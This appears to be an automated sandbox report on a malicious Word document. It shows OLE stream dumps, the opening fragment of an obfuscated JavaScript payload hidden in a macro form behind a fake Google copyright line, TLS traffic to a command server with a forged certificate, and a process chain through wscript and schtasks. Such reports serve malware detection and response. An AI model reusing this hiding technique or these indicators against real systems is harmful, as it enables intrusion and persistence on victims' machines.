Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF, CR line terminators, Stream Size: 291 |
---|
General | |
---|---|
Stream Path: | Macros/UserForm1/\x3VBFrame |
File Type: | ASCII text, with CRLF, CR line terminators |
Stream Size: | 291 |
Entropy: | 4.6035537314 |
Base64 Encoded: | True |
Data ASCII: | V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 1 3 3 7 . . C l i e n t L e f t = 2 1 . . C l i e n t T o p = 3 2 2 . . C l i e n t W i d t h = 2 1 9 8 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n |
Data Raw: | 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 |
Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 94 |
---|
General | |
---|---|
Stream Path: | Macros/UserForm1/f |
File Type: | data |
Stream Size: | 94 |
Entropy: | 2.63195667756 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . } . . % . . . 6 . . . . . . . . . . . . . . . . . 0 . . . . . h o . . ( . . . . . . . . . . . . . 2 . . . . . . . . . . . L a b e l 1 . . . . . . . . . . |
Data Raw: | 00 04 20 00 08 0c 00 0c 01 00 00 00 01 00 00 00 00 7d 00 00 25 0f 00 00 36 09 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 30 00 00 00 00 01 68 6f 00 00 28 00 f5 01 00 00 06 00 00 80 01 00 00 00 32 00 00 00 84 b7 01 00 00 00 15 00 4c 61 62 65 6c 31 00 00 d5 00 00 00 00 00 00 00 |
Stream Path: Macros/UserForm1/o, File Type: data, Stream Size: 112516 |
---|
General | |
---|---|
Stream Path: | Macros/UserForm1/o |
File Type: | data |
Stream Size: | 112516 |
Entropy: | 3.79176326 |
Base64 Encoded: | True |
Data ASCII: | . . . . ( . . . T . . . / * | * | * C o p y r i g h t 2 0 0 5 G o o g l e , I n c . . | * | * A l l r i g h t s r e s e r v e d . | * | * v . 1 . 8 3 | * | * / | * | v a r j b o s y p t a n l e b i m e z u l z y m u t y b n u d m a z m a m o z t a n w i v o q s u m u f u q u q f a r u q m y z t y p i g e r u s x o n k y p y g u w f y f o q e c l a d y v u r h e m w i d f o j i m a d h u r y t s u n t e c s e g x a p a b n e k i f o b e t b i t o v e t o w y x t y b y l j a |
Data Raw: | 00 02 08 00 28 00 00 00 54 b7 01 80 2f 2a 7c 2a 7c 20 2a 20 20 43 6f 70 79 72 69 67 68 74 20 32 30 30 35 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 2e 2e 7c 2a 7c 20 2a 20 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 7c 2a 7c 20 2a 20 20 76 2e 20 31 2e 38 33 7c 2a 7c 20 2a 2f 7c 2a 7c 76 61 72 20 6a 62 6f 73 79 70 74 61 6e 6c 65 62 69 6d 65 7a 75 6c 7a 79 6d 75 74 79 62 |
Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3522 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 3522 |
Entropy: | 4.38132542916 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . |
Data Raw: | cc 61 97 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00 |
Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 810 |
---|
General | |
---|---|
Stream Path: | Macros/VBA/dir |
File Type: | data |
Stream Size: | 810 |
Entropy: | 6.50619704379 |
Base64 Encoded: | True |
Data ASCII: | . & . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . C . [ . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . | . . [ . |
Data Raw: | 01 26 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 c7 43 d7 5b 07 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 |
Stream Path: WordDocument, File Type: data, Stream Size: 4096 |
---|
General | |
---|---|
Stream Path: | WordDocument |
File Type: | data |
Stream Size: | 4096 |
Entropy: | 1.06127588563 |
Base64 Encoded: | False |
Data ASCII: | . . . . _ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . 4 . . . b . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . . 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | ec a5 c1 00 5f c0 19 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 34 0e 00 00 62 7f 00 00 62 7f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 9, 2017 14:01:03.588519096 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:03.588606119 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:03.588782072 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:03.646631002 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:03.646661997 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:04.835303068 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:04.835351944 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:04.835366964 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:04.835552931 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:04.842401981 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:04.842434883 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:04.843794107 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:05.044481039 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:05.044622898 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:05.186239958 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:05.186414957 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:05.186770916 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:05.959671021 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:05.959749937 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:05.959947109 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:05.964972019 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:05.965003967 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:06.452359915 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:06.452394009 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:06.452419043 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:06.452946901 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:06.454158068 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:06.454202890 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:06.455718040 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:06.656451941 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:06.657588959 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:06.894402027 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:06.894623041 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:06.894886017 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:07.414731026 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:07.616456032 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:07.616699934 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:07.626754999 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:07.626971960 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:07.627264023 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:07.627429962 MEZ | 49163 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:07.627482891 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:08.297745943 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:08.500480890 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:08.500701904 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:08.509295940 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:08.509495020 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:08.509718895 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:08.510251045 MEZ | 49164 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:08.510296106 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:53.621213913 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:53.621274948 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:53.621995926 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:53.622769117 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:53.622793913 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:54.146044016 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:54.156970978 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:54.157011986 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:54.170855999 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:54.170917988 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:54.174230099 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:54.174267054 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:54.174623966 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:54.174639940 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:55.789771080 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:55.789818048 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:55.789900064 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:55.790915012 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:55.790942907 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:55.982198954 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.184468031 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.184781075 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.233095884 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.233125925 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.233289003 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.233304024 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.233318090 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.233483076 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.233501911 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.233588934 MEZ | 49168 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.233599901 MEZ | 443 | 49168 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.529485941 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.608778954 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.608804941 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.676901102 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.676923990 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.677572966 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.677587032 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
Nov 9, 2017 14:01:56.677644014 MEZ | 49169 | 443 | 192.168.1.16 | 85.93.2.148 |
Nov 9, 2017 14:01:56.677656889 MEZ | 443 | 49169 | 85.93.2.148 | 192.168.1.16 |
HTTP Request Dependency Graph |
---|
HTTPS Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Subject | Issuer | Not Before | Not After | Certificate details |
---|---|---|---|---|---|---|---|---|---|
Nov 9, 2017 14:01:04.835366964 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 | EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | Wed Nov 08 14:01:04 CET 2017 | Thu Nov 08 14:01:04 CET 2018 | V3; SHA1withRSA (OID 1.2.840.113549.1.1.5); RSA 1024-bit, public exponent 3; serial acda3d75 8bf3f455; 5 extensions: AuthorityKeyIdentifier (issuer serial d21ef1f6 e34f6bb8), BasicConstraints CA:false, ExtendedKeyUsage serverAuth, KeyUsage DigitalSignature Key_Encipherment, SubjectKeyIdentifier |
Nov 9, 2017 14:01:04.835366964 MEZ | 443 | 49163 | 85.93.2.148 | 192.168.1.16 | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | Tue Mar 17 15:16:38 CET 2015 | Thu Mar 09 15:16:38 CET 2045 | V3; SHA1withRSA (OID 1.2.840.113549.1.1.5); RSA 4096-bit, public exponent 65537; serial d21ef1f6 e34f6bb8; self-signed (Subject equals Issuer, AuthorityKeyIdentifier matches SubjectKeyIdentifier); 3 extensions: AuthorityKeyIdentifier, BasicConstraints CA:true PathLen:2147483647, SubjectKeyIdentifier |
Nov 9, 2017 14:01:06.452419043 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 | EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | Wed Nov 08 14:01:04 CET 2017 | Thu Nov 08 14:01:04 CET 2018 | V3; SHA1withRSA (OID 1.2.840.113549.1.1.5); RSA 1024-bit, public exponent 3; serial acda3d75 8bf3f455; 5 extensions: AuthorityKeyIdentifier (issuer serial d21ef1f6 e34f6bb8), BasicConstraints CA:false, ExtendedKeyUsage serverAuth, KeyUsage DigitalSignature Key_Encipherment, SubjectKeyIdentifier |
Nov 9, 2017 14:01:06.452419043 MEZ | 443 | 49164 | 85.93.2.148 | 192.168.1.16 | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | Tue Mar 17 15:16:38 CET 2015 | Thu Mar 09 15:16:38 CET 2045 | V3; SHA1withRSA (OID 1.2.840.113549.1.1.5); RSA 4096-bit, public exponent 65537; serial d21ef1f6 e34f6bb8; self-signed (Subject equals Issuer, AuthorityKeyIdentifier matches SubjectKeyIdentifier); 3 extensions: AuthorityKeyIdentifier, BasicConstraints CA:true PathLen:2147483647, SubjectKeyIdentifier |
Nov 9, 2017 14:02:07.483278990 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 | EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | Wed Nov 08 14:01:04 CET 2017 | Thu Nov 08 14:01:04 CET 2018 | V3; SHA1withRSA (OID 1.2.840.113549.1.1.5); RSA 1024-bit, public exponent 3; serial acda3d75 8bf3f455; 5 extensions: AuthorityKeyIdentifier (issuer serial d21ef1f6 e34f6bb8), BasicConstraints CA:false, ExtendedKeyUsage serverAuth, KeyUsage DigitalSignature Key_Encipherment, SubjectKeyIdentifier |
Nov 9, 2017 14:02:07.483278990 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | Tue Mar 17 15:16:38 CET 2015 | Thu Mar 09 15:16:38 CET 2045 | V3; SHA1withRSA (OID 1.2.840.113549.1.1.5); RSA 4096-bit, public exponent 65537; serial d21ef1f6 e34f6bb8; self-signed (Subject equals Issuer, AuthorityKeyIdentifier matches SubjectKeyIdentifier); 3 extensions: AuthorityKeyIdentifier, BasicConstraints CA:true PathLen:2147483647, SubjectKeyIdentifier |
HTTPS Proxied Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Header / Data | Total Bytes Transferred (KB) |
---|---|---|---|---|---|---|
2017-11-09 13:01:05 UTC | 49163 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:05 UTC | 49163 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:05 UTC | 49163 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:06 UTC | 49164 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:06 UTC | 49164 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:06 UTC | 49164 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:07 UTC | 443 | 49163 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:01:07 UTC | 443 | 49163 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:01:08 UTC | 443 | 49164 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:01:08 UTC | 443 | 49164 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:01:54 UTC | 49168 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:54 UTC | 49168 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:54 UTC | 49168 | 443 | 192.168.1.16 | 85.93.2.148 | 8 | |
2017-11-09 13:01:55 UTC | 443 | 49168 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:01:55 UTC | 443 | 49168 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:01:56 UTC | 49169 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:56 UTC | 49169 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:56 UTC | 49169 | 443 | 192.168.1.16 | 85.93.2.148 | 8 | |
2017-11-09 13:01:57 UTC | 443 | 49169 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:02:07 UTC | 49170 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:02:07 UTC | 49170 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:02:07 UTC | 49170 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:02:09 UTC | 443 | 49170 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:02:09 UTC | 443 | 49170 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:02:10 UTC | 49171 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:02:10 UTC | 49171 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:02:10 UTC | 49171 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:02:12 UTC | 443 | 49171 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:02:12 UTC | 443 | 49171 | 85.93.2.148 | 192.168.1.16 | 0 | |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 14:00:53 |
Start date: | 09/11/2017 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x77390000 |
File size: | 1423008 bytes |
MD5 hash: | 5D798FF0BE2A8970D932568068ACFD9D |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:01:02 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x77390000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:01:03 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x75300000 |
File size: | 141824 bytes |
MD5 hash: | 979D74799EA6C8B8167869A68DF5204A |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:01:04 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\schtasks.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x75440000 |
File size: | 179712 bytes |
MD5 hash: | 2003E9B15E1C502B146DAD2E383AC1E3 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:00 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\taskeng.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x772c0000 |
File size: | 192000 bytes |
MD5 hash: | 4F2659160AFCCA990305816946F69407 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:00 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x76f10000 |
File size: | 141824 bytes |
MD5 hash: | 979D74799EA6C8B8167869A68DF5204A |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:03 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x75440000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:03 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x612d0000 |
File size: | 46080 bytes |
MD5 hash: | B9A4DAC2192FD78CDA097BFA79F6E7B2 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:05 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x75440000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:33 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x75440000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:33 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\ARP.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x772c0000 |
